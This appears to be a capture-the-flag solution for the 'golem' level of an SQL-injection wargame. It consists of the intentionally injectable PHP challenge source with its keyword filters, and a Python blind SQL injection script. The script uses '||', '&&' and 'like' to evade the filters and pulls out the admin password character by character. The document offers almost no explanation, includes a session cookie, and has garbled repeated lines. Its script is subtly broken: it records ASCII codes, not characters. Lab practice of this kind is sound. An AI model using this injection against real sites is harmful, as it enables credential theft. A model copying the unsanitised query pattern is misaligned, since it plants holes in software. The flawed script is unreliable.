Hello {$result[id]}

Hello {$result[id]}

Hello {$result[id]}

GOLEM Clear!

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>

#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

headers = {'Cookie': 'PHPSESSID=rhijn6n7j32iq1sketdpdhk7bn;'}
url = "<https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php>"
string = "1234567890abcdefghijklmnopqrstuvwxyz"

pw= ""
len = 1

while 1 :
    query = "?pw=' || id like 'admin' %26%26 length(pw) < " + str(len) + "%23"
    r = requests.get(url+query,headers=headers)
    if r.text.find('Hello admin') != -1 :
        break
    len += 1

print ("passwd length : ",len-1)

for i in range(1, 9):
    for ch in range(48, 123):
        if 58 <= ch <= 64: continue
        if 91 <= ch <= 96: continue
        query = "?pw=' || id like 'admin' %26%26 ascii(mid(pw," + str(i) + ",1)) like " + str(ch) + "%23 "
        r = requests.get(url + query, headers=headers)
        if r.text.find('Hello admin') != -1:
            pw = pw + str(ch)
            break

    print ("passwd : ", pw)